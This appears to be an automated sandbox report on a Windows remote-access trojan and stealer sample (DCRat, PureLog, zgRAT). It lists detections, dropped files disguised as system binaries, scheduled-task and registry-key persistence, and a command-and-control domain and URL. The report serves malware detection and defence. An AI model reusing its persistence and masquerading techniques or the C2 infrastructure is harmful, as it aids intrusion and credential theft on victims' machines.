                    Source: Yara matchFile source: 00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1861105197.0000000012615000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 0.2.JNKHlxGvw4.exe.1ad80000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.JNKHlxGvw4.exe.1ad80000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: 00000000.00000002.1861105197.00000000128AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: JNKHlxGvw4.exe PID: 6588, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: USZqVcJFLA.exe PID: 1432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7808, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.JNKHlxGvw4.exe.1ad80000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.JNKHlxGvw4.exe.1ad80000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1861105197.0000000012615000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 0.2.JNKHlxGvw4.exe.1ad80000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.JNKHlxGvw4.exe.1ad80000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts11
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		OS Credential Dumping2
                    File and Directory Discovery                    		1
                    Taint Shared Content                    		11
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		11
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory14
                    System Information Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Obfuscated Files or Information                    		Security Account Manager11
                    Security Software Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron21
                    Registry Run Keys / Startup Folder                    		21
                    Registry Run Keys / Startup Folder                    		11
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object ModelInput Capture13
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets41
                    Virtualization/Sandbox Evasion                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    File Deletion                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items133
                    Masquerading                    		DCSync1
                    Remote System Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572666 Sample: JNKHlxGvw4.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 66 188387cm.n9shteam.in 2->66 78 Suricata IDS alerts for network traffic 2->78 80 Found malware configuration 2->80 82 Antivirus detection for URL or domain 2->82 84 15 other signatures 2->84 8 JNKHlxGvw4.exe 11 30 2->8         started        12 USZqVcJFLA.exe 2->12         started        14 lsass.exe 2 2->14         started        16 10 other processes 2->16 signatures3 process4 file5 50 C:\Users\user\Favorites\lsass.exe, MS-DOS 8->50 dropped 52 C:\Users\user\Desktop\vnccfbfp.log, PE32 8->52 dropped 54 C:\Users\user\Desktop\uhdUZoxx.log, PE32 8->54 dropped 56 11 other malicious files 8->56 dropped 86 Creates an undocumented autostart registry key 8->86 88 Creates multiple autostart registry keys 8->88 90 Uses schtasks.exe or at.exe to add and modify task schedules 8->90 98 3 other signatures 8->98 18 cmd.exe 8->18         started        21 csc.exe 4 8->21         started        24 powershell.exe 8->24         started        26 6 other processes 8->26 92 Antivirus detection for dropped file 12->92 94 Multi AV Scanner detection for dropped file 12->94 96 Machine Learning detection for dropped file 12->96 signatures6 process7 file8 70 Uses ping.exe to sleep 18->70 72 Uses ping.exe to check the status of other devices and networks 18->72 28 USZqVcJFLA.exe 18->28         started        44 3 other processes 18->44 48 C:\Windows\...\SecurityHealthSystray.exe, PE32 21->48 dropped 74 Infects executable files (exe, dll, sys, html) 21->74 32 conhost.exe 21->32         started        34 cvtres.exe 1 21->34         started        76 Loading BitLocker PowerShell Module 24->76 36 conhost.exe 24->36         started        38 WmiPrvSE.exe 24->38         started        40 conhost.exe 26->40         started        42 conhost.exe 26->42         started        46 3 other processes 26->46 signatures9 process10 dnsIp11 68 188387cm.n9shteam.in 104.21.16.1, 49741, 49762, 49763 CLOUDFLARENETUS United States 28->68 58 C:\Users\user\Desktop\oBKeyAWK.log, PE32 28->58 dropped 60 C:\Users\user\Desktop\bSdYXpxm.log, PE32 28->60 dropped 62 C:\Users\user\Desktop\OljzCgRG.log, PE32 28->62 dropped 64 C:\Users\user\DesktopDQjSEMY.log, PE32 28->64 dropped file12

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    JNKHlxGvw4.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    JNKHlxGvw4.exe100%AviraTR/Dropper.Gen
                    JNKHlxGvw4.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat100%AviraBAT/Delbat.C
                    C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe100%AviraTR/Dropper.Gen
                    C:\Recovery\USZqVcJFLA.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\Desktop\EDQjSEMY.log100%AviraTR/AVI.Agent.updqb
                    C:\Program Files\Windows Multimedia Platform\SystemSettings.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\Desktop\RzSYqgUu.log100%AviraTR/AVI.Agent.updqb
                    C:\Users\user\Desktop\OljzCgRG.log100%AviraTR/PSW.Agent.qngqt
                    C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe100%Joe Sandbox ML
                    C:\Recovery\USZqVcJFLA.exe100%Joe Sandbox ML
                    C:\Program Files\Windows Multimedia Platform\SystemSettings.exe100%Joe Sandbox ML
                    C:\Users\user\Desktop\oBKeyAWK.log100%Joe Sandbox ML
                    C:\Users\user\Desktop\OljzCgRG.log100%Joe Sandbox ML
                    C:\Users\user\Desktop\AsBtWtog.log100%Joe Sandbox ML
                    C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Program Files\Windows Multimedia Platform\SystemSettings.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Recovery\USZqVcJFLA.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Users\user\Desktop\AsBtWtog.log8%ReversingLabs
                    C:\Users\user\Desktop\EDQjSEMY.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Desktop\OljzCgRG.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Desktop\RzSYqgUu.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Desktop\bSdYXpxm.log25%ReversingLabs
                    C:\Users\user\Desktop\oBKeyAWK.log8%ReversingLabs
                    C:\Users\user\Desktop\uhdUZoxx.log25%ReversingLabs
                    C:\Users\user\Desktop\vnccfbfp.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Favorites\lsass.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php100%Avira URL Cloudmalware
                    http://188387cm.n9shteam.in100%Avira URL Cloudmalware
                    http://188387cm.n9shteam.in/100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    188387cm.n9shteam.in
                    		104.21.16.1
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.phptrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000001D.00000002.1978904137.000001421EE99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://188387cm.n9shteam.inUSZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002CDF000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://188387cm.n9shteam.in/USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002B0E000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001D.00000002.1978904137.000001421EE99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://nuget.org/nuget.exepowershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Licensepowershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Iconpowershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://aka.ms/pscore68powershell.exe, 0000001D.00000002.1978904137.000001421EC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E300001000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameJNKHlxGvw4.exe, 00000000.00000002.1832050899.0000000002A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1978904137.000001421EC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E300001000.00000004.00000800.00020000.00000000.sdmp, USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              104.21.16.1
                                              		188387cm.n9shteam.inUnited States
                                              		13335CLOUDFLARENETUStrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1572666
                                              Start date and time:2024-12-10 18:54:02 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 52s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:56
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Sample name:JNKHlxGvw4.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:6689bd9a5c795eedc631e5fbb850b7ff.exe
                                              Detection:MAL
                                              Classification:mal100.spre.troj.expl.evad.winEXE@47/59@1/1
                                              EGA Information:
                                              • Successful, ratio: 25%
                                              HCA Information:Failed
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                              • Excluded domains from analysis (whitelisted): dl.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target RuntimeBroker.exe, PID 7808 because it is empty
                                              • Execution Graph export aborted for target USZqVcJFLA.exe, PID 1432 because it is empty
                                              • Execution Graph export aborted for target USZqVcJFLA.exe, PID 6596 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • VT rate limit hit for: JNKHlxGvw4.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              12:55:09API Interceptor179x Sleep call for process: powershell.exe modified
                                              12:55:24API Interceptor1x Sleep call for process: USZqVcJFLA.exe modified
                                              17:55:06Task SchedulerRun new task: lsass path: "C:\Users\user\Favorites\lsass.exe"
                                              17:55:06Task SchedulerRun new task: lsassl path: "C:\Users\user\Favorites\lsass.exe"
                                              17:55:07Task SchedulerRun new task: RuntimeBroker path: "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                                              17:55:07Task SchedulerRun new task: RuntimeBrokerR path: "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                                              17:55:07Task SchedulerRun new task: USZqVcJFLA path: "C:\Recovery\USZqVcJFLA.exe"
                                              17:55:07Task SchedulerRun new task: USZqVcJFLAU path: "C:\Recovery\USZqVcJFLA.exe"
                                              17:55:10Task SchedulerRun new task: JNKHlxGvw4 path: "C:\Users\user\Desktop\JNKHlxGvw4.exe"
                                              17:55:10Task SchedulerRun new task: JNKHlxGvw4J path: "C:\Users\user\Desktop\JNKHlxGvw4.exe"
                                              17:55:10Task SchedulerRun new task: SystemSettings path: "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
                                              17:55:10Task SchedulerRun new task: SystemSettingsS path: "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
                                              17:55:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                                              17:55:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run USZqVcJFLA "C:\Recovery\USZqVcJFLA.exe"
                                              17:55:29AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\Users\user\Favorites\lsass.exe"
                                              17:55:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
                                              17:55:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run JNKHlxGvw4 "C:\Users\user\Desktop\JNKHlxGvw4.exe"
                                              17:55:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                                              17:56:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run USZqVcJFLA "C:\Recovery\USZqVcJFLA.exe"
                                              17:56:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\Users\user\Favorites\lsass.exe"
                                              17:56:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
                                              17:56:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run JNKHlxGvw4 "C:\Users\user\Desktop\JNKHlxGvw4.exe"
                                              17:56:34AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                                              17:56:43AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run USZqVcJFLA "C:\Recovery\USZqVcJFLA.exe"
                                              17:56:51AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\Users\user\Favorites\lsass.exe"
                                              17:56:59AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
                                              17:57:07AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run JNKHlxGvw4 "C:\Users\user\Desktop\JNKHlxGvw4.exe"
                                              17:57:23AutostartRun: WinLogon Shell "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                                              17:57:32AutostartRun: WinLogon Shell "C:\Recovery\USZqVcJFLA.exe"
                                              17:57:40AutostartRun: WinLogon Shell "C:\Users\user\Favorites\lsass.exe"

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              104.21.16.1http://riginaros.blogspot.com/#x034rT96G0Get hashmaliciousPorn ScamBrowse
                                                sjoslin@odeonuk.com_print.svgGet hashmaliciousUnknownBrowse
                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                        YewXqKOwfT.exeGet hashmaliciousLummaC StealerBrowse
                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                              file.exeGet hashmaliciousLummaC StealerBrowse

                                                                Domains

                                                                No context

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUShttp://enteolcl.top/Get hashmaliciousUnknownBrowse
                                                                • 104.21.112.1
                                                                ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.64.208
                                                                751ietQPnX.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                • 172.64.41.3
                                                                l92fYljXWF.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                • 172.64.41.3
                                                                qxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                • 172.64.41.3
                                                                taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                • 172.64.41.3
                                                                Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                • 172.64.41.3
                                                                CMK7DB5YtR.exeGet hashmaliciousLummaC StealerBrowse
                                                                • 104.21.64.1
                                                                XrQ8NgQHTn.exeGet hashmaliciousLummaC StealerBrowse
                                                                • 104.21.64.1
                                                                https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.comGet hashmaliciousCaptcha PhishBrowse
                                                                • 172.67.145.201

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\user\Desktop\AsBtWtog.log4si9noTBNw.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  FToZAUe1tw.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    fnNUIS1KeW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      kqq1aAcVUQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        Qsi7IgkrWa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          qNdO4D18CF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            4Awb1u1GcJ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              LzmJLVB41K.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                s5duotgoYD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  QMT2731i8k.exeGet hashmaliciousDCRatBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Program Files (x86)\Windows Photo Viewer\en-GB\9e8d7a4ca61bd9

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):113
                                                                                    Entropy (8bit):5.566304267644814
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:1IGL99n3t6rt9UxTE7ZJQWz/pE3SSNx5P2SDdV7:TLMrFUWYSSNfPzdV7
                                                                                    MD5:816FA48FE26673C0D64554AAE166346D
                                                                                    SHA1:5AB70C7AB8EB8FA1D6FB2C3C6E19DDBF4901F979
                                                                                    SHA-256:FCA52A501321D1CFFDF280185FB3FA359A6350D046F8AA0BD2400818DA8301CB
                                                                                    SHA-512:70623C9480A92C4C652251BA3E10C393BE60532C585322B277CE15427116CF74E4C0438B3CE39C5CA4D8DE8ED53671D70FC30A1CB0DE28C677785B2FB24FFC22
                                                                                    Malicious:false
                                                                                    Preview:p0lQSmKUF11etHXoniGiLqO1unRsXc4yNTyZq7byBq4qGkYawipxv048lufoVb7n7DRZS78qHRhewhuKP06ywHDWY0y5bxdjtQtDT9Iyk9pdTaME9

                                                                                    C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                    Category:dropped
                                                                                    Size (bytes):1560958
                                                                                    Entropy (8bit):7.974265283144141
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:K17t7ROjwJqMAVS2hEijP79eAPkavlCCyYcBoZ11q8UuZPt5PsuWg:KBt7R0wJ4L5Uw5lCCyG31oIPmg
                                                                                    MD5:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    SHA1:B63D8E25D4EB9ABEA3ED0F7867F70DB2AB18CBA2
                                                                                    SHA-256:CB4626AD921C63113E18C3AEFB109F70C8E334089871133EA675D62D836D810B
                                                                                    SHA-512:FF51CCD8918344BB0439A4D9E39394383BFF2196496D778DB9A3D2862479E55F1BF59C7D467FF055C721231CB592C3C7DED63C5AF28A3F9552DC6421DD1151BF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                                                    C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe:Zone.Identifier

                                                                                    Download File
